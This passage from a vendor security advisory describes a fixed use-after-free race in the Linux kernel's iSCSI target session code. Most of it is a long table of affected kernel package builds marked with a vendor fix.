| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
In the Linux kernel, the following vulnerability has been resolved: scsi: target: iscsi: Fix use-after-free in iscsit_dec_session_usage_count() In iscsit_dec_session_usage_count(), the function calls complete() while holding the sess->session_usage_lock. Similar to the connection usage count logic, the waiter signaled by complete() (e.g., in the session release path) may wake up and free the iscsit_session structure immediately. This creates a race condition where the current thread may attempt to execute spin_unlock_bh() on a session structure that has already been deallocated, resulting in a KASAN slab-use-after-free. To resolve this, release the session_usage_lock before calling complete() to ensure all dereferences of the sess pointer are finished before the waiter is allowed to proceed with deallocation.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
